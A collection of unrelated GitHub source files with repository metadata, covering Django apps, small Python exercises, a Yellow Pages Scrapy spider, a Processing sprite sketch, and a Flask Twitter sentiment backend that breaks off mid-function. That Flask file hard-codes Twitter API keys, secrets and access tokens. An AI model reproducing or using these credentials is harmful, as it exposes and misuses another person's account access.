print(preds2.shape)
if __name__ == "__main__":
test1()
test2()
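# Expected shapes when running the tests above (hedged: derived by hand from the layer
# strides, not stated in the original file): the U-Net style Generator maps a
# (1, 3, 256, 256) input back to (1, 3, 256, 256), while the PatchGAN-style Discriminator
# (three stride-2 and two stride-1 4x4 convolutions) reduces the concatenated image pair
# to a (1, 1, 30, 30) grid of patch scores.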
author: rosasha.noreply@github.com
file: /users/admin.py | repo: burkero2/DjangoRestFrameScriptReview | license: no_license
from django.contrib import admin
from users.models import User
admin.site.register(User)
# Register your models here.
author: ronanburke@codeinstitute.net
file: /users/forms.py | repo: Sakkadas/Notes | license: MIT
|
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from .models import Profile
class ProfileUpdateForm(forms.ModelForm):
class Meta:
model = Profile
fields = ['image']
class UserRegisterForm(UserCreationForm):
email = forms.EmailField()
class Meta:
model = User
fields = ['username', 'email', 'password1', 'password2']
class UserUpdateForm(forms.ModelForm):
email = forms.EmailField()
class Meta:
model = User
fields = ['username', 'email']
author: eildos95@gmail.com
file: /backend/src/pages/api/views.py | repo: ashishsth7586/portfolio_ashish | license: no_license
from rest_framework import generics
from ..models import Landing, About, SocialMedia, Quote, Testimonial, Service
from .serializers import LandingSerializer, AboutSerializer, SocialMediaSerializer, QuotesSerializer, ServicesSerializer, TestimonialsSerializer
from rest_framework.permissions import IsAuthenticated
class LandingList(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
queryset = Landing.objects.all()
serializer_class = LandingSerializer
class AboutList(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
queryset = About.objects.all()
serializer_class = AboutSerializer
class SocialMediaList(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
queryset = SocialMedia.objects.all()
serializer_class = SocialMediaSerializer
class QuotesList(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
queryset = Quote.objects.all()
serializer_class = QuotesSerializer
class ServicesList(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
queryset = Service.objects.all()
serializer_class = ServicesSerializer
class TestimonialsList(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
queryset = Testimonial.objects.all()
serializer_class = TestimonialsSerializer
author: ashishsth7586@gmail.com
file: /exps-gsn-edf/gsn-edf_ut=2.5_rd=0.5_rw=0.06_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=97/sched.py | repo: ricardobtxr/experiment-scripts | license: no_license
-X FMLP -Q 0 -L 5 124 400
-X FMLP -Q 0 -L 5 96 400
-X FMLP -Q 1 -L 4 85 250
-X FMLP -Q 1 -L 4 68 300
-X FMLP -Q 2 -L 4 68 400
-X FMLP -Q 3 -L 2 46 175
43 250
33 250
29 150
22 100
21 175
14 125
author: ricardo.btxr@gmail.com
file: /2-4-Partition.py | repo: jihua0125/CrackingCode | license: no_license
from linked_list import LinkedList
import numpy as np
def partition(ll,value):
current=ll.tail=ll.head
while current:
next_node=current.next
if current.data<value:
current.next=ll.head
ll.head=current
else:
ll.tail.next=current
ll.tail=current
current=next_node
if ll.tail.next !=None:
ll.tail.next = None
def main():
linked_list=LinkedList()
random_list=np.random.permutation([1,2,3,4,5,6,7,8,9,10])
for i in random_list:
linked_list.append(i)
    print(linked_list)
    partition(linked_list,7)
    print(linked_list)
if __name__=='__main__':
main()
author: 410763264@qq.com
file: /final test/tests/CreateTestFiles.py | repo: asafweinberg/swProject | license: no_license
import pandas as pd
import numpy as np
from sklearn.datasets import make_blobs
import matplotlib.pyplot as plt
import os
'''Creates the files for all goals except jacobi'''
filesToCreate = pd.read_csv(os.path.join(".", "tests", "FilesToCreate.csv"))
i = 0
for row in filesToCreate.itertuples():
if (i == 10):
continue
n_centers = row.n_clusters
samples = row.n_samples
features = row.features
file_name = f"test{i}.csv"
X, y = make_blobs(n_samples=samples, centers=n_centers, n_features=features,
random_state=31, shuffle=True, cluster_std=0.3)
resultPath = os.path.join(".", "tests", "test_data", "spk_tests", file_name)
np.savetxt(resultPath, X, delimiter=",", fmt="%.4f")
#plt.plot(X[:, 0], X[:, 1], 'o', label = 'data')
#plt.show()
i += 1
'''Creates the files for jacobi'''
np.random.seed(0)
dim = 2
for i in range(12):
if (i == 11):
continue
mat = np.random.rand(dim, dim)
mat = np.tril(mat) + np.tril(mat, -1).T
resultPath = os.path.join(".", "tests", "test_data", 'jacobi_tests',f"test{i}.csv")
np.savetxt(resultPath, mat, delimiter=",", fmt="%.4f")
dim += 1
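# Why tril + tril(-1).T gives a symmetric test matrix (hedged: an explanatory note, not
# part of the original script): np.tril(mat) keeps the lower triangle including the
# diagonal, and np.tril(mat, -1).T mirrors the strictly-lower part into the upper
# triangle, so for a 2x2 input [[a, b], [c, d]] the result is [[a, c], [c, d]], which is
# exactly the kind of symmetric input the Jacobi eigenvalue tests need.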
author: 73112049+Carinz@users.noreply.github.com
file: /Clase2/main.py | repo: VirtualEvan/Practicas_ALS | license: no_license
|
l = [1, 2, 3]
# Print a list
print(l)
# Print every element
for x in l:
    print(x, end=' ')
print()
for i, x in enumerate(l):
    print(str.format("{0}: {1}", i, x), end=', ')
# Number of elements
print("\nNumber of elements: ", len(l))
# Slices
# From the second element onwards
print("\nFrom the second onwards: ", l[1:])
# By range
print("\nFirst two by range: ", l[0:2])
# Up to the second element
print("\nUp to the second: ", l[:2])
# Last element
print("\nLast element: ", l[-1])
# List "comprehensions"
# new_list = [ <expr> for <id> in <expr that returns a list> ]
print("\n", list([float(x) for x in l]))
# <cond>? <val1>:<val2>
# | in Python
# V
# <val1> if <cond> else <val2>
print([x for x in l if x % 2 == 0])
# A neat little Fibonacci
def fibonacci(x):
    toret = [0, 1]
    if x == 1:
        print([0, 1])
    for _ in range(x-2):
        toret.append(toret[-2] + toret[-1])
    print("Fibonacci", toret)
fibonacci(4)
# Primes
def primos(x):
    """
    Returns a list with the prime numbers below a given natural number.
    :param x: A given natural number
    :return: The list of primes below x
    """
    def esprimo(n):
        """
        Determines whether a natural number is a prime number
        :param n: A given natural number
        :return: True if prime, False otherwise
        """
        toret = False
        if n < 2:
            toret = False
        elif n == 2:
            toret = True
        elif n % 2 == 0:
            toret = False
        else:
            for i in range(3, n, 2):
                if n % i == 0:
                    break
            else:
                toret = True
                # Runs only when the loop did not break
        return toret
    toret = []
    for i in range(0, x):
        if esprimo(i):
            toret.append(i)
    return toret
print("Primes: ", primos(10))
|
[
"virtualevan@gmail.com"
] |
virtualevan@gmail.com
|
744dfd4eea05bb5f89cb394fc9b7a7d0ad5e9d41
|
1b532f79e859705052ec77404fff3d4da5de0029
|
/5.py
|
3fbc31bf3dac5fc18bb76d7bb61004d1c569bd21
|
[] |
no_license
|
salmanchik1/Project_Euler
|
270808f6e5785669d970b63cfd111bf7250bfe82
|
1e8a322dbded17366c1b2d841a2645332c9114d6
|
refs/heads/master
| 2021-07-08T03:23:13.123859
| 2020-11-05T20:49:07
| 2020-11-05T20:49:07
| 203,200,636
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 377
|
py
|
# This algorithm written in Python 3.7
number = 1
maxim = 20
divs = list()
for i in range(2, maxim+1):
temp = i
for d in divs:
if temp % d == 0:
temp = int(temp / d)
if temp > 1:
divs.append(temp)
for i in divs:
number *= i
print("The smallest number divisible by all the numbers "
"from 1 to {} is {}".format(maxim, number))
|
[
"salmanov.ramis@gmail.com"
] |
salmanov.ramis@gmail.com
|
a54fc74712c2351e533d5d191a62f6d9f51adafe
|
043758666a3e92fb301249d0d09047827ec4aeaf
|
/yellowscrapper/yellowscrapper-backup.py
|
74b76d163cabe7b3d759b74f61a6662209e90d2d
|
[] |
no_license
|
oasisers99/auyellow
|
981aba4a7b9c2d3a545d8194c6c0c546aeef43f8
|
e8444d789236230b3c63ff1157d63bd461830c7a
|
refs/heads/master
| 2020-04-03T01:01:43.584647
| 2017-07-19T01:50:53
| 2017-07-19T01:50:53
| 95,749,868
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,078
|
py
|
import scrapy
#scrapy crawl yellow -o medical.json -t jsonlines
class YellowSpider(scrapy.Spider):
name = "yellow"
category = "medical"
start_urls = [
'https://www.yellowpages.com.au/search/listings?clue='+category+'&locationClue=australia',
]
def parse(self, response):
# Target the main list that does not have ads.
        # 'category' is a class attribute, so read it via self (there is no module-level global).
        for yellow in response.xpath("//div[@class='cell in-area-cell middle-cell']//a[@class='listing-name']"):
            yield {
                'category': self.category,
'business_name': yellow.css("::text").extract_first(),
#'author': quote.css('small.author::text').extract_first(),
#'tags': quote.css('div.tags a.tag::text').extract(),
}
# Target the 'next' page link.
next_page = response.xpath("//a[@class='pagination navigation'][last()]/@href").extract_first()
if next_page is not None:
next_page = response.urljoin(next_page)
yield scrapy.Request(next_page, callback=self.parse)
|
[
"minseok@proviso.com.au"
] |
minseok@proviso.com.au
|
437cfbfa7c38cf89e1a99c34ac5bd06994a25269
|
c78f8b10dee1be23ec69b1140066a3b555cd19fa
|
/climatevis/ClimateApp/tempCodeRunnerFile.py
|
0c63b1cb874ae082af86c4027f90f21a9148e7a7
|
[] |
no_license
|
ishancoderr/ClimateApp
|
b49ef10363147005de433af9121be958e82f6c8d
|
9b5a0e1877cf0ce99fe59976e2454bfa443c6dd0
|
refs/heads/main
| 2023-03-14T13:38:25.458507
| 2021-03-17T13:37:45
| 2021-03-17T13:37:45
| 348,718,810
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 224
|
py
|
from django.urls import path
from . import views  # assumed relative import for the views referenced below
urlpatterns = [
    path('', views.IndexView, name="home"),
    path('dashboard/', views.dashboardView, name="dashboard"),
    path('login/',),     # view not yet specified in this temp file
    path('register/',),  # view not yet specified in this temp file
    path('logout/',),    # view not yet specified in this temp file
]
|
[
"noreply@github.com"
] |
ishancoderr.noreply@github.com
|
d8f26552c908700a66965cea7e9d501644e592e1
|
6a54f6ed872a990669c1f75eaeae51e99ef2268c
|
/prefix-1.py
|
c5a359f626c175767f12e49f03cbca5f859b1bd9
|
[] |
no_license
|
SamK1102/CA116
|
f3d872f5c09b51cfcf9eca88803f8b11a42b470c
|
a0edf8ead224979187d41b94326abaabe5aa4a45
|
refs/heads/master
| 2020-04-06T14:57:41.595781
| 2018-12-04T15:48:37
| 2018-12-04T15:48:37
| 157,560,670
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 231
|
py
|
#!/usr/bin/env python
if __name__ == "__main__":
a = ["mountain", "montagne", "mont", "mo", "montages", "zebra", "monthly"]
s = "mont"
i = 0
while i < len(a):
if (a[i][:len(s)] == s):
print a[i]
i = i + 1
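    # An equivalent, more idiomatic check (added sketch, same output as the loop above):
    # for word in a:
    #     if word.startswith(s):
    #         print word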
|
[
"noreply@github.com"
] |
SamK1102.noreply@github.com
|
7682d6c07e4a6d11881df7f096b87f6cb3449778
|
0890a25baf9508092e6f3f90008eb47aefb1fd0d
|
/quickmansprite.pyde
|
7215c542f65c2060004f1cb89023be340c453930
|
[] |
no_license
|
kiwi-fruitiwi/quickmansprite
|
3dd0731cedb9cd6ee2e19261270fbefd1ec79977
|
23736f0c26b27fbfd71ef27a07bf8f9323b6974b
|
refs/heads/main
| 2023-07-26T00:32:21.564367
| 2021-09-02T22:43:05
| 2021-09-02T22:43:05
| 389,968,587
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,006
|
pyde
|
# Coding Challenge #111: animated sprite
# 2021.07.27
# We're planning to animate Quick Man from Mega Man 2
# see https://www.youtube.com/watch?v=8s_00b0stJU for mm2 gameplay
#
# v0.01 animate quick man boss intro sequence with custom spritesheet
# v0.02 cut and animate walking sequence
# explore: how do we reverse an image?
# v0.03 draw walking quickman and use WASD to initiate walking animation
# v0.04 cut and animate jumping sequence » W to jump
# v0.05 cut and animate block
# v0.06 shoot + boomerangs
#
#
#
# BUG: image uses a top left rectangle coordinate but we want center
from Sprite import Sprite
def setup():
global sprites, mirror
colorMode(HSB, 360, 100, 100, 100)
spritesheet = loadImage("quickman-run-shoot-boomerangs.png")
size(700, 300)
# frameRate(10)
delay(100) # with no delay we never get to see the 1st frame
ichi = spritesheet.get(0, 32, 32, 32)
ni = spritesheet.get(32, 32, 32, 32)
san = spritesheet.get(64, 32, 32, 32)
imgs = [ni, ichi, ni, san]
sprites = []
mirror = False
# for i in range(9):
# sprites.append(Sprite(imgs, 10, 10 + i * 32, random(0.15, 0.25), move=True))
# sprites.append(sprite_quickman_intro())
for i in range(100):
particle = Sprite(imgs, random(width), random(height), random(0.15, 0.25), move=True)
sprites.append(particle)
def draw():
global sprites, mirror
background(209, 95, 33)
for sprite in sprites:
sprite.update()
sprite.edges()
sprite.animate()
sprite.show()
# for sprite in sprites:
# if mirror:
# sprite.show_mirror()
# else:
# sprite.show()
# sprite.animate()
def keyPressed():
global mirror
if key == 'm':
mirror = not mirror
# returns a quick man intro sprite sequence
def sprite_quickman_intro():
spritesheet = loadImage("quickman-intro.png")
SPRITE_DIMENSIONS = 32
s = 3 * SPRITE_DIMENSIONS # desired sprite size scale factor
# put each frame in an imgs list starting with []
imgs = []
for i in range(8):
img = spritesheet.get(i*SPRITE_DIMENSIONS, 0, 32, 32)
img.resize(s, s)
imgs.append(img)
# for i in range(9):
# sprites.append(Sprite(imgs, 10, 10 + i * 32, random(0.15, 0.25)))
# quick man intro sequence
intro = Sprite(imgs, width/2 - s/2, height/2 - s/2, 0.15, move=False)
return intro
# this code displays quick man's 8-frame intro animation
def spriteless_quickman_intro():
spritesheet = loadImage("quickman-intro.png")
# allows us to select the position of the sprite in the sprite sheet
# as a function of the framecount
x = frameCount % 8 * 32
# All robot master sprites in mega man 2 are 32x32.
#
# The original spritesheet had too little space between each quickman,
# I edited the file and fixed this.
#
# The boss intro sprites start at 0,0 and are 32x32 across 8 sprites
SPRITE_DIMENSIONS = 32
img = spritesheet.get(x, 0, 32, 32)
s = SPRITE_DIMENSIONS * 3 # s is the side length of a square sprite
img.resize(s, s) # let's make it easier to see and debug
# center the sprite on the canvas using its side length, s
image(img, width/2 - s/2, height/2 - s/2)
# our original code without using our Sprite object
def objectless_sprite():
spritesheet = loadImage("quickman-run-shoot-boomerangs.png")
ichi = spritesheet.get(0, 32, 32, 32)
ni = spritesheet.get(32, 32, 32, 32)
san = spritesheet.get(64, 32, 32, 32)
imgs = [ni, ichi, ni, san]
SPRITE_DIMENSIONS = 32
s = SPRITE_DIMENSIONS * 3 # s is the side length of a square sprite
for img in imgs:
img.resize(s, s) # let's make it easier to see and debug
image(imgs[frameCount % len(imgs)], width/2-s/2, height/2 - s/2)
|
[
"zane.tian@gmail.com"
] |
zane.tian@gmail.com
|
6b34f7ac5fa39f607628f1f9a9cb7721a347f201
|
c1e93f2110db91b22609762aa1c9cfcf608c0975
|
/music/migrations/0006_auto_20200523_1934.py
|
389d3011f271ef1dd7e441c917ad3957049e11bf
|
[] |
no_license
|
eliyajoseph7/music_app
|
6f49979726b65cc9b664602acd263d2b787128b0
|
802780e6186f7cd3ba27a4b1c21f09f701c7cb1e
|
refs/heads/master
| 2022-07-04T22:54:22.775210
| 2020-05-24T19:44:38
| 2020-05-24T19:44:38
| 264,457,951
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 551
|
py
|
# Generated by Django 3.0.2 on 2020-05-23 16:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('music', '0005_auto_20200523_1831'),
]
operations = [
migrations.AlterModelOptions(
name='wordsofwisdom',
options={'ordering': ['date']},
),
migrations.AlterField(
model_name='wordsofwisdom',
name='image',
field=models.ImageField(default='scoan.png', upload_to='wisdom_images'),
),
]
|
[
"exaveryeliya20@gmail.com"
] |
exaveryeliya20@gmail.com
|
ef0c8cfa4b93452b1906d594b5415c9bac502824
|
6b1f5f6597d51125e0cfae59300ea75153e3e498
|
/Test/myChart.py
|
c4e31c161b3a62d8714684977ca82fce2a50cbc3
|
[] |
no_license
|
zhangzongbo/spider
|
3eba26e212703cdd1ddbf760c1ffa623f03f08ad
|
8dfd98b1e2e2f5a4401c4f682dda2016939f2d0c
|
refs/heads/master
| 2020-03-25T14:12:25.996603
| 2019-08-13T07:52:19
| 2019-08-13T07:52:19
| 143,855,627
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 637
|
py
|
from pyecharts import Bar
bar = Bar("我的第一个图表", "这里是副标题")
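# (The title and subtitle above translate to "My first chart" / "This is the subtitle".)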
bar.use_theme('dark')
bar.add("服装", ["衬衫", "羊毛衫", "雪纺衫", "裤子", "高跟鞋", "袜子"], [5, 20, 36, 10, 75, 90])
bar.add("topK", ["张悬", "晚安", "荣幸", "何其", "珍惜", "爱心", "真的", "时候", "拥抱", "知道", "关于", "没有", "首歌", "自己",
"喜欢", "侥幸", "拥有", "人生", "失去", "我爱你"], [0, 302, 357, 362, 401, 484, 626, 816, 865, 964, 1056, 1129,
1185, 1503, 2118, 2618, 2655, 2706, 2758, 2983])
bar.render()
|
[
"zhangzongbo1994@gmail.com"
] |
zhangzongbo1994@gmail.com
|
d9ab06c72d99dfe38d4dd22f885bc5a20e145dc0
|
e21a22e5c7c92b28460b75106a965c81327ae6e4
|
/polls/views.py
|
410746ed5adda2ee205827bee8e07605173a0ee8
|
[
"MIT"
] |
permissive
|
vakhov/django-vote-example
|
356e031483b292eadaefd6087d89ebc52fe8c7a5
|
0e27e07d9cdfd2bcc06635bf2a79e7ef5d225f4f
|
refs/heads/master
| 2020-07-30T14:20:17.670548
| 2017-11-05T15:37:36
| 2017-11-05T15:37:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,480
|
py
|
from django.shortcuts import get_object_or_404, render
from django.http import HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.views import generic
from django.utils import timezone
from .models import Question, Choice
class IndexView(generic.ListView):
template_name = 'polls/index.html'
context_object_name = 'latest_question_list'
def get_queryset(self):
"""Return the last five published questions."""
return Question.objects.order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
model = Question
template_name = 'polls/detail.html'
class ResultsView(generic.DetailView):
model = Question
template_name = 'polls/results.html'
def vote(request, question_id):
p = get_object_or_404(Question, pk=question_id)
try:
selected_choice = p.choice_set.get(pk=request.POST['choice'])
except (KeyError, Choice.DoesNotExist):
# Redisplay the question voting form.
return render(request, 'polls/detail.html', {
'question': p,
'error_message': "You didn't select a choice.",
})
else:
selected_choice.votes += 1
selected_choice.save()
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('polls:results', args=(p.id,)))
|
[
"yxwzaxns@gmail.com"
] |
yxwzaxns@gmail.com
|
3f135cd5cd8056baca9a2970e258d3bbce6ca2e5
|
a271140b2895c637512850394cd701ff6e519eba
|
/Ejemplo8.py
|
44945e80efb38d64be168e8a7713e7f5673c5330
|
[] |
no_license
|
AntonioCatalanSanchez/EjerciciosPython
|
200ec456d3fc31e710602d509d124ceff0df345c
|
a849b5575ee385c23daf16e2b0ee1380ef7a4ff1
|
refs/heads/master
| 2020-05-04T22:04:10.870937
| 2019-04-04T12:59:37
| 2019-04-04T12:59:37
| 179,498,331
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 165
|
py
|
# Prints the prime factorisation of the given number, one factor per line
# (e.g. entering 12 prints 2, 2 and 3).
x=2
numero=int(input("enter a number: "))
while(numero != 1):
    if(numero % x==0):
        print (str(x))
        numero=numero/x
    else:
        x = x + 1
|
[
"antonio.catalansanchez@telefonica.com"
] |
antonio.catalansanchez@telefonica.com
|
769fc6529e818632e8697f4316f134bee5fd1efc
|
797ba1fee05e90bea95964f12c5e9ca3bb889dca
|
/feed/migrations/0010_feed_image.py
|
80a738b16f7051b87554822e38e23927f449054d
|
[] |
no_license
|
sanjanaasinha/insta-me
|
3b12383164e07a28444c0e36d65ad52869bedb94
|
6ede9c8c3a67cf9b22cc0fcd92d5a3d42aa2b46e
|
refs/heads/master
| 2021-09-08T00:51:28.452384
| 2018-03-04T18:39:44
| 2018-03-04T18:39:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 541
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-02-24 16:52
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('feed', '0009_remove_feed_image'),
]
operations = [
migrations.AddField(
model_name='feed',
name='image',
field=models.FileField(default=django.utils.timezone.now, upload_to=''),
preserve_default=False,
),
]
|
[
"sanjana.ss.sinha@gmail.com"
] |
sanjana.ss.sinha@gmail.com
|
694bbf8a0bc9a70bcc2d0decb623a43285ed0a43
|
1c3fb3c990bd07259c1701c709a28ec45cd0c748
|
/services/core-api/app/api/now_applications/resources/now_application_import_resource.py
|
d81a820815a7f11229bf5e30b97e659e6572e3c3
|
[
"Apache-2.0"
] |
permissive
|
usingtechnology/mds
|
f973106232f73f773bb4bb57737094dd32b1bd3c
|
c9c542f729df21511ee46e184ea752bad0b7d10c
|
refs/heads/master
| 2022-04-13T07:56:59.060216
| 2020-03-21T22:43:05
| 2020-03-21T22:43:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,693
|
py
|
import uuid
from datetime import datetime
from decimal import Decimal
from flask import request, current_app
from flask_restplus import Resource
from werkzeug.exceptions import BadRequest, InternalServerError, NotFound
from app.extensions import api
from app.api.utils.access_decorators import requires_role_view_all, requires_role_edit_permit, requires_any_of, VIEW_ALL
from app.api.utils.resources_mixins import UserMixin
from app.api.utils.custom_reqparser import CustomReqparser
from app.api.mines.mine.models.mine import Mine
from app.api.now_applications.models.now_application_identity import NOWApplicationIdentity
from app.api.now_applications.models.now_application import NOWApplication
from app.api.now_applications.models.activity_summary.exploration_access import ExplorationAccess
from app.api.now_applications.models.activity_summary.exploration_surface_drilling import ExplorationSurfaceDrilling
from app.api.now_applications.models.unit_type import UnitType
from app.api.now_applications.models.activity_detail.exploration_surface_drilling_detail import ExplorationSurfaceDrillingDetail
from app.api.now_applications.transmogrify_now import transmogrify_now
class NOWApplicationImportResource(Resource, UserMixin):
parser = CustomReqparser()
parser.add_argument('mine_guid', type=str, help='guid of the mine.', required=True)
parser.add_argument(
'longitude',
type=lambda x: Decimal(x) if x else None,
help='Longitude point for the Notice of Work.',
location='json')
parser.add_argument(
'latitude',
type=lambda x: Decimal(x) if x else None,
help='Latitude point for the Notice of Work.',
location='json')
@requires_role_edit_permit
@api.expect(parser)
def post(self, application_guid):
data = self.parser.parse_args()
mine_guid = data.get('mine_guid')
latitude = data.get('latitude')
longitude = data.get('longitude')
mine = Mine.find_by_mine_guid(mine_guid)
if not mine:
raise NotFound('Mine not found')
now_application_identity = NOWApplicationIdentity.query.filter_by(
now_application_guid=application_guid).first()
if not now_application_identity:
raise NotFound('No identity record for this application guid.')
application = transmogrify_now(now_application_identity)
application.mine_guid = mine_guid
application.latitude = latitude
application.longitude = longitude
application.now_application_guid = application_guid
application.save()
return {'now_application_guid': str(application.now_application_guid)}
|
[
"bcgov-csnr-cd@gov.bc.ca"
] |
bcgov-csnr-cd@gov.bc.ca
|
8a3ffbbf040fed8d8a8b53a2550dfa256919edbb
|
d24cf7a2691f52ef2caf4578f8ee1feee3bab9e3
|
/computeQuantizationError.py
|
a0f714b0b29d4c970c5c40f6613bfef6210cafc4
|
[] |
no_license
|
SrinidhiPalwayi/ps3
|
e2a651c5da3c80ae86817053c605f8af6f0cafeb
|
fb03663cb0d82eedb6dc2a21c22a80d20614de68
|
refs/heads/master
| 2020-04-02T16:21:55.821199
| 2018-10-25T04:17:41
| 2018-10-25T04:17:41
| 154,609,228
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 424
|
py
|
import matplotlib.pyplot as plt
import numpy as np
from sklearn import cluster
from scipy import misc
import scipy.misc
from skimage import color
def computeQuantizationError(origImage, quantizedImg):
start = plt.imread(origImage)
start = np.array(start, dtype='float')
end = quantizedImg
diff = np.subtract(start,end)
diff = diff.flatten()
square = np.power(diff,2)
return np.sum(square)
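# Hypothetical usage sketch (the file name below is a placeholder, not part of this module):
# quantized = np.array(plt.imread("image.png"), dtype='float')
# print(computeQuantizationError("image.png", quantized))   # 0.0 when nothing differs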
|
[
"srinidhipalwayi@lawn-143-215-114-218.lawn.gatech.edu"
] |
srinidhipalwayi@lawn-143-215-114-218.lawn.gatech.edu
|
77f975580a4eff9e2a4663283f48895dc34d8117
|
9374a0514cf193189f57f6ee96b4c4c7d226c689
|
/config.py
|
6e6df87c59768c72662dd74b2511825eccd2a749
|
[] |
no_license
|
h4ck3rm1k3/replication-mirror
|
cbb08d8e29e3cd190816896939c0df2b7b21c93e
|
aaa69a8843e86744194bf7584d15bd76a7b71947
|
refs/heads/master
| 2021-01-15T10:37:14.184293
| 2012-09-03T21:41:22
| 2012-09-03T21:41:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 170
|
py
|
REPLICATE_BASE = 'http://planet.openstreetmap.org/redaction-period/minute-replicate/'
REPLICATE_DISK = '/home/pnorman/osm/replication-mirror/redaction-minute-replication'
|
[
"penorman@mac.com"
] |
penorman@mac.com
|
1465d969eefc5d32ecc6801620377401355e9a4c
|
0f4d72e1d30d2986e5fdfc98723b260166132e03
|
/tests/gpflow/likelihoods/test_heteroskedastic.py
|
8ad798ec3e236f03b623943501ba8864c035b2b8
|
[
"Apache-2.0"
] |
permissive
|
vishalbelsare/GPflow
|
4991c238b7f8021c155940f3dfe99fb6bf0186ca
|
b716d22c7428f1bbe6bf4b361fdd0c7cb342a000
|
refs/heads/develop
| 2023-08-17T12:04:09.178253
| 2023-08-09T07:05:49
| 2023-08-09T07:05:49
| 392,794,283
| 0
| 0
|
Apache-2.0
| 2023-08-09T11:34:26
| 2021-08-04T18:42:41
|
Python
|
UTF-8
|
Python
| false
| false
| 1,688
|
py
|
# Copyright 2020 The GPflow Contributors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import tensorflow as tf
from gpflow.base import AnyNDArray
from gpflow.likelihoods import HeteroskedasticTFPConditional
tf.random.set_seed(99012)
class Data:
rng = np.random.RandomState(123)
N = 5
X = np.linspace(0, 1, num=N)[:, None]
Y = rng.randn(N, 1)
f_mean = rng.randn(N, 2)
f_var: AnyNDArray = rng.randn(N, 2) ** 2
def test_analytic_mean_and_var() -> None:
"""
Test that quadrature computation used in HeteroskedasticTFPConditional
of the predictive mean and variance is close to the analytical version,
which can be computed for the special case of N(y | mean=f1, scale=exp(f2)),
where f1, f2 ~ GP.
"""
analytic_mean = Data.f_mean[:, [0]]
analytic_variance = np.exp(Data.f_mean[:, [1]] + Data.f_var[:, [1]]) ** 2 + Data.f_var[:, [0]]
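    # Derivation note: with y | f ~ N(f1, exp(f2)^2), f1 ~ N(m1, v1) and f2 ~ N(m2, v2),
    # the law of total variance gives
    #   E[y] = m1  and  Var[y] = E[exp(2*f2)] + Var[f1] = exp(2*m2 + 2*v2) + v1,
    # which is exactly what analytic_mean and analytic_variance compute above.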
likelihood = HeteroskedasticTFPConditional()
y_mean, y_var = likelihood.predict_mean_and_var(Data.X, Data.f_mean, Data.f_var)
np.testing.assert_allclose(y_mean, analytic_mean)
np.testing.assert_allclose(y_var, analytic_variance, rtol=1.5e-6)
|
[
"noreply@github.com"
] |
vishalbelsare.noreply@github.com
|
7e74111ed54dae397d94ad4472237e042aa8c481
|
3b8d74a60e923da959e8d36a74b34c10e11c3733
|
/backend/index.py
|
672c53b56cac6f04c0d11a740ed7d4166ff931c0
|
[] |
no_license
|
zain-mustafa/sentiment-analysis
|
ca7d86f27fc73d16d5339918b01074b939968896
|
42d0de01d305d3e61770d198d003616c6df2807e
|
refs/heads/master
| 2020-05-19T10:59:54.738766
| 2019-05-05T05:11:35
| 2019-05-05T05:11:35
| 184,979,562
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 39,516
|
py
|
import json
import re
from flask import Flask, jsonify
import tweepy
from twython import Twython, TwythonError
from tweepy import OAuthHandler
from textblob import TextBlob
import requests
import pymongo
from pymongo import MongoClient
app = Flask(__name__)
consumer_key = 'iSaIm4vG1kI2wGkaiuWYD5vN9'
consumer_secret = '5zBcyyMS20926lWyXNnJq2vjnQNiHMNNHElD7Ymnbc5n5zACJ3'
access_token = '1050518240974258179-9Gpi9dZA77Ivs1hhFy8JThC6iCqY6l'
access_token_secret = 'jy6jeQsdyp9Q2ySlPtrgyckadzYfddmxitvl9cB7uhnAy'
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
twitter = Twython(consumer_key, consumer_secret, access_token, access_token_secret)
client = MongoClient('mongodb://localhost:27017')
db = client.saugs
@app.route('/twitter/<query>')
def get_tweets(query):
count = 100
users_with_geodata = {
"data": []
}
all_users = []
total_tweets = 0
geo_tweets = 0
countries = get_countries_list()
fetched_tweets = api.search(q = query, count = count)
for tweet in fetched_tweets:
tweet_text = tweet.text
sentiment_analysis = get_tweet_sentiment(tweet_text)
if tweet.user.id:
total_tweets += 1
user_id = tweet.user.id
if user_id not in all_users:
all_users.append(user_id)
user_data = {
"user_id" : tweet.user.id,
"result" : {
"name" : tweet.user.name,
"id": tweet.user.id,
"screen_name": tweet.user.screen_name,
"tweets" : 1,
"location": tweet.user.location,
}
}
